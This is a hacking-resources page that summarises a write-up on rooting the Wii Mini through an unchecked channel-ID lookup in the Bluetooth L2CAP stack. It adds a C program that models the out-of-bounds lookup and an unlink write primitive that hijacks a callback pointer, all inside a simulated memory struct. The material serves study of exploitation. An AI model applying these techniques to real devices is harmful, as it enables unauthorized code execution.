Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Hacking the Wii Mini

Dexter Gerig, posted 4 years ago
  • The Wii Mini is a cut-down Wii: no SD card slot, no networking and no GameCube support, so it only plays Wii games offline. The author wanted to root it, but that small attack surface made it hard. After looking at the camera library, various games and a few other things, they settled on the Bluetooth stack.
  • The Broadcom Bluetooth stack was open-sourced years ago because it is used in a myriad of Android devices. It was originally called Bluedroid and is now known as Fluoride.
  • Part of the stack is the L2CAP layer. L2CAP plays a role similar to TCP in the IP stack: it provides segmentation and reassembly, retransmission, and a port-like abstraction called channels, each identified by a channel ID (CID). When a connection is made, a channel is allocated for that service.
  • The bug is in how channel IDs arriving in L2CAP packets are resolved. Each channel is tracked by a Channel Control Block (CCB), and a helper function looks up the CCB for a given CID. The helper checks that reserved CIDs are not used, but it has NO upper-bounds check, so a large CID indexes past the end of the CCB array: an out-of-bounds access on the CCB pool.
  • To exploit this, the attacker needs a fake CCB at the address the out-of-bounds index resolves to. Luckily that address falls in .bss, whose layout is static. Manual code review turned up a small buffer used by the SDP client: an array of 0x15 uint32_t elements. The real CCB structure is much larger than that, but the fields that matter all sit at the start of the struct, so the buffer is big enough.
  • Exploitation is still harder than it sounds. A function pointer in the controllable region would have been ideal, but what the author actually had control of were the channel state, a pair of doubly linked list pointers and some ID fields.
  • The doubly linked list pointers give an arbitrary write primitive when the element is unlinked: unlink writes each pointer into the other node, so the attacker gets a write of a chosen value to a chosen address, at the cost of a mirror write in the other direction that must land on writable memory. To avoid crashing along the way, the channel state is set so that only the intended code paths run; after some investigation this turned out to be feasible.
  • The author uses the unlink write to overwrite a function pointer with the address of shellcode. The Wii has neither ASLR nor DEP, so from there code execution is trivial. The SDP client provides another attacker-controllable buffer of about 1000 bytes in .bss, and execution is redirected there. It holds a first-stage loader that repairs the program state and then loads a USB loader as the second stage. Wii compromised!
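As an added illustration (my own model, not the article's code and not Fluoride's), the C program below shows both halves of the bug class summarised above: a CID-to-CCB lookup that rejects reserved CIDs but never checks the upper bound, so a large CID indexes past the CCB pool into an attacker-controlled SDP buffer holding a fake CCB, and a textbook unlink on that fake node that turns its two list pointers into a write of a chosen value (the shellcode address) to a chosen address (a function-pointer slot), with the unavoidable mirror write absorbed by the writable shellcode buffer. The struct layout and field names, the reserved-CID boundary 0x40, the pool size and the .bss arrangement are all assumptions made for the demo; the 0x15-word and 1000-byte SDP buffers are the sizes the write-up mentions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Demo model only: names, layout and the reserved-CID boundary are assumptions,
 * not Fluoride's real code. The CCB keeps just the leading fields the write-up
 * says matter; the real struct is much larger. */
typedef struct ccb {
    uint32_t in_use;
    uint32_t local_cid;
    uint32_t chnl_state;   /* steering field: chosen so only safe paths run */
    struct ccb *p_next;    /* doubly linked list pointers consumed by unlink */
    struct ccb *p_prev;
} ccb_t;

#define MAX_CCBS      4
#define BASE_CID      0x40   /* assumed: CIDs below this are reserved */
#define SDP_BUF_WORDS 0x15   /* the 0x15-word SDP client buffer from the write-up */
#define STAGE1_BYTES  1000   /* the larger SDP buffer that holds the first-stage loader */

/* Contiguous model of the relevant .bss region, so an out-of-bounds index
 * stays inside memory this program owns instead of being undefined. */
typedef struct {
    ccb_t     ccb_pool[MAX_CCBS];
    uint32_t  sdp_buf[SDP_BUF_WORDS];  /* attacker-controlled: holds the fake CCB */
    uintptr_t callback;                /* stand-in for the function pointer to hijack */
    uint8_t   stage1[STAGE1_BYTES];    /* attacker-controlled: stand-in for shellcode */
} bss_model_t;

/* Vulnerable lookup: rejects reserved CIDs but never checks idx < MAX_CCBS,
 * so a large CID yields a pointer past the end of the pool. */
ccb_t *find_ccb_by_cid_vuln(bss_model_t *bss, uint16_t cid)
{
    if (cid < BASE_CID)
        return NULL;
    size_t idx = cid - BASE_CID;   /* no upper bound */
    unsigned char *pool = (unsigned char *)bss + offsetof(bss_model_t, ccb_pool);
    return (ccb_t *)(pool + idx * sizeof(ccb_t));
}

/* Hardened lookup: the missing upper-bounds check. */
ccb_t *find_ccb_by_cid_fixed(bss_model_t *bss, uint16_t cid)
{
    if (cid < BASE_CID || (size_t)(cid - BASE_CID) >= MAX_CCBS)
        return NULL;
    return &bss->ccb_pool[cid - BASE_CID];
}

/* Textbook unlink, done with byte copies so the node may live in any buffer:
 *   next->p_prev = prev;   prev->p_next = next;
 * With next/prev attacker-chosen, the first is the intended write and the
 * second the mirror write that must land on writable memory. */
void unlink_ccb(ccb_t *p_ccb)
{
    unsigned char *node = (unsigned char *)p_ccb;
    ccb_t *next, *prev;
    memcpy(&next, node + offsetof(ccb_t, p_next), sizeof next);
    memcpy(&prev, node + offsetof(ccb_t, p_prev), sizeof prev);
    memcpy((unsigned char *)next + offsetof(ccb_t, p_prev), &prev, sizeof prev);
    memcpy((unsigned char *)prev + offsetof(ccb_t, p_next), &next, sizeof next);
}

/* Runs the chain; returns 1 if the fake CCB is reached through the vulnerable
 * lookup and unlink writes the address of stage1 into callback. */
int demo_unlink_write(bss_model_t *bss)
{
    memset(bss, 0, sizeof *bss);
    /* Pick the CID whose unchecked index lands exactly on sdp_buf[0]. */
    size_t off = offsetof(bss_model_t, sdp_buf) - offsetof(bss_model_t, ccb_pool);
    if (off % sizeof(ccb_t) != 0) return 0;
    uint16_t cid = (uint16_t)(BASE_CID + off / sizeof(ccb_t));

    /* Fake CCB: p_prev is the value to write (shellcode address), p_next is
     * where to write it (callback slot, rebased by the p_prev field offset). */
    ccb_t fake;
    memset(&fake, 0, sizeof fake);
    fake.in_use = 1;
    fake.local_cid = cid;
    fake.chnl_state = 1;   /* assumed: the state that routes into the unlink path */
    fake.p_prev = (ccb_t *)bss->stage1;
    fake.p_next = (ccb_t *)((unsigned char *)&bss->callback - offsetof(ccb_t, p_prev));
    memcpy(bss->sdp_buf, &fake, sizeof fake);   /* 32 bytes fit in 0x15 words */

    if (find_ccb_by_cid_fixed(bss, cid) != NULL) return 0;   /* fixed version refuses */
    ccb_t *p_ccb = find_ccb_by_cid_vuln(bss, cid);
    if ((void *)p_ccb != (void *)bss->sdp_buf) return 0;     /* vuln version hits our buffer */

    unlink_ccb(p_ccb);

    if (bss->callback != (uintptr_t)bss->stage1) return 0;  /* intended write */
    /* Mirror write landed at stage1 + offsetof(p_next), inside the writable
     * buffer; real shellcode simply leaves that slot unused. */
    uintptr_t mirror;
    memcpy(&mirror, bss->stage1 + offsetof(ccb_t, p_next), sizeof mirror);
    return mirror == (uintptr_t)fake.p_next;
}

int main(void)
{
    static bss_model_t bss;
    printf("unlink write: %s\n", demo_unlink_write(&bss) ? "callback hijacked" : "failed");
    return 0;
}
```

The two lookups differ by one comparison, which is the whole fix. The mirror write is why the write-up says the primitive "writes in both directions": whatever value you write must itself be a writable address, which is exactly why pointing it at shellcode in .bss works on a target without DEP.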